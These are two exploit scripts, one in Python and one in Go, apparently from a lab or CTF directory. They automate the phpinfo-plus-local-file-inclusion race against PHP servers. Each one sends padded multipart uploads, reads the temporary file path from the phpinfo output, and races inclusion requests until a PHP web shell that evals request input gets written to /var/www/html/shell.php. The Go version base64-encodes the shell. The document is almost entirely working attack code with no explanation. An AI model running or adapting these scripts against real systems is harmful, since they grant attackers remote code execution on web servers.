File: iphpinfo_lfi/exp/exp.py

from urllib.parse import urlsplit
from socket import socket,AF_INET,SOCK_STREAM,gethostbyname
import requests
import threading
import sys


tag="SECURITY"
payload=f"""{tag}
<?php file_put_contents('/var/www/html/shell.php', '<?=eval($_REQUEST[1])?>')?>"""
post_body=f"""-----------------------------7dbff1ded0714
Content-Disposition: form-data; name="dummyname"; filename="test.txt"
Content-Type: text/plain

{payload}
-----------------------------7dbff1ded0714--""".replace("\n","\r\n")
 

padding="x" * 5000
http_post=f"""POST /?a={padding} HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie={padding}\r
Accept: {padding}\r
User-Agent: {padding}\r
Accept-Language: {padding}\r
Pragma: {padding}\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: {len(post_body)}\r
Host: 127.0.0.1:16789\r
\r
{post_body}"""


tcp_payload = {"lfi":"""GET /?file={} HTTP/1.1
User-Agent: Mozilla/4.0
Proxy-Connection: Keep-Alive
Host: 127.0.0.1:16789


""".replace("\n","\r\n"),"phpinfo":http_post}

tmpfile_offset = 0

class EXP(threading.Thread):
    def __init__(self, host , port, event):
        threading.Thread.__init__(self)
        global tmpfile_offset
        self.event = event
        self.host = gethostbyname(host)
        self.port = port
        self.tmpfile_path = ""
        self.tmpfile_offset = tmpfile_offset if tmpfile_offset else self.__tmpfile_offset()

    def __tmpfile_offset(self):
        print("[+] trying to get offset ......")
        global tmpfile_offset
        host = self.host
        port = self.port
        s = socket(AF_INET,SOCK_STREAM)
        s.connect((host,port))
        s.send(tcp_payload["phpinfo"].encode("utf-8"))
        r = 0
        data = b""
        while 1:
            d = s.recv(0x1000)
            data += d
            if not d:
                break
            if d.endswith(b"\r\n\r\n"):
                break
        s.close()
        r = data.find(b"[tmp_name] =&gt;")
        r += len("[tmp_name] =&gt;") + 1
        self.tmpfile_offset = r
        tmpfile_offset = r
        
        return r


    def phpinfo_lfi(self):
        socket_phpinfo = socket(AF_INET,SOCK_STREAM)
        socket_phpinfo.connect(
            (self.host , self.port)
        )
        socket_lfi = socket(AF_INET,SOCK_STREAM)
        socket_lfi.connect(
            (self.host , self.port)
        )
        socket_phpinfo.send(tcp_payload["phpinfo"].encode("utf-8"))
        
        data = b""
        l = 0
        while len(data) < self.tmpfile_offset:
            d = socket_phpinfo.recv(0x1000)
            data += d

        self.tmpfile_path = data[self.tmpfile_offset:self.tmpfile_offset + len('/tmp/phpbKZj97')].decode("utf-8")
        socket_lfi.send(tcp_payload["lfi"].format(self.tmpfile_path).encode("utf-8"))
        r = socket_lfi.recv(0x1000)
        socket_phpinfo.close()
        socket_lfi.close()
        if r.find(tag.encode("utf-8")) != -1:
            return self.tmpfile_path

    def run(self):
        while not self.event.is_set():
            x = self.phpinfo_lfi()
            if x:
                print("[!] Get shell!!!")
                self.event.set()
        return

if __name__ == "__main__":
    event = threading.Event()
    event.clear()
    EXP("127.0.0.1",16789,event)
    print("[+] tmpfile offset : " + str(tmpfile_offset))
    tp = []
    for i in range(10):
        tp.append(EXP("127.0.0.1",16789,event))
    for t in tp:
        t.start()
    for t in tp:
        t.join()

File: iphpinfo_lfi/exp/exp.go
package main

import (
	"bytes"
	"context"
	"fmt"
	"net"
	"strings"
)

var ctx, cancel = context.WithCancel(context.Background())
var payload = `SECURUTY <?php file_put_contents("/var/www/html/shell.php",base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NvZGUnXSk7Pz4="));?>`
var post_body string = fmt.Sprintf(`-----------------------------7dbff1ded0714
Content-Disposition: form-data; name="dummyname"; filename="test.txt"
Content-Type: text/plain

%s
-----------------------------7dbff1ded0714--`, payload)
var post_body_1 = strings.ReplaceAll(post_body, "\n", "\r\n")

var padding = strings.Repeat("x", 5000)
var http_post = strings.ReplaceAll(fmt.Sprintf(`POST /?a=%s HTTP/1.1
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=%s
Accept: %s
User-Agent: %s
Accept-Language: %s
Pragma: %s
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714
Content-Length: %d
Host: 127.0.0.1:16789

%s`, padding, padding, padding, padding, padding, padding, len(post_body_1), post_body), "\n", "\r\n")

var tcp_payloads = map[string]string{
	"phpinfo": http_post,
	"lfi": strings.ReplaceAll(`GET /index.php?file=%s HTTP/1.1
Host: 127.0.0.1:16789
User-Agent: curl/7.68.0
Accept: */*

`, "\n", "\r\n"),
}

func get_tmpfile_offset() int {
	conn, _ := net.Dial("tcp", "127.0.0.1:16789")
	defer conn.Close()
	payload := tcp_payloads["phpinfo"]
	conn.Write([]byte(payload))
	var resp [0xffffff]byte
	var l = 0
	var n int
	for {
		n, _ = conn.Read(resp[l:])
		if n == 0 {
			break
		} else {
			l += n
		}
	}
	r := bytes.Index(resp[:], []byte("[tmp_name] =&gt;"))
	r += len("/tmp/phpbKZj97") + 3
	println("[+] offset : ", r)
	return r
}

func phpinfo_lfi(tmpfile_offset int, i int) {
	for {
		var resp [0xffffff]byte
		conn_phpinfo, _ := net.Dial("tcp", "127.0.0.1:16789")
		conn_lfi, _ := net.Dial("tcp", "127.0.0.1:16789")
		payload := tcp_payloads["phpinfo"]
		conn_phpinfo.Write([]byte(payload))
		var l = 0
		var n int
		for l < tmpfile_offset {
			n, _ = conn_phpinfo.Read(resp[l : l+0x1000])
			if n != 0 {
				l += n
			} else {
				break
			}

		}
		tmpfile_path := string(resp[tmpfile_offset : tmpfile_offset+len("/tmp/phpbKZj97")])
		// println("[+] complete  : ", tmpfile_path)
		payload = fmt.Sprintf(tcp_payloads["lfi"], tmpfile_path)
		conn_lfi.Write([]byte(payload))
		var resp_1 [0x1000]byte
		conn_lfi.Read(resp_1[0:])
		conn_lfi.Close()
		conn_phpinfo.Close()
		r := bytes.Index(resp_1[:], []byte("SECURUTY"))
		if r != -1 {
			println("[!] Get shell ~~~")
			cancel()
		}
	}
}
func main() {
	offset := get_tmpfile_offset()
	for i := 0; i < 10; i++ {
		go phpinfo_lfi(offset, i)
	}
	<-ctx.Done()
}
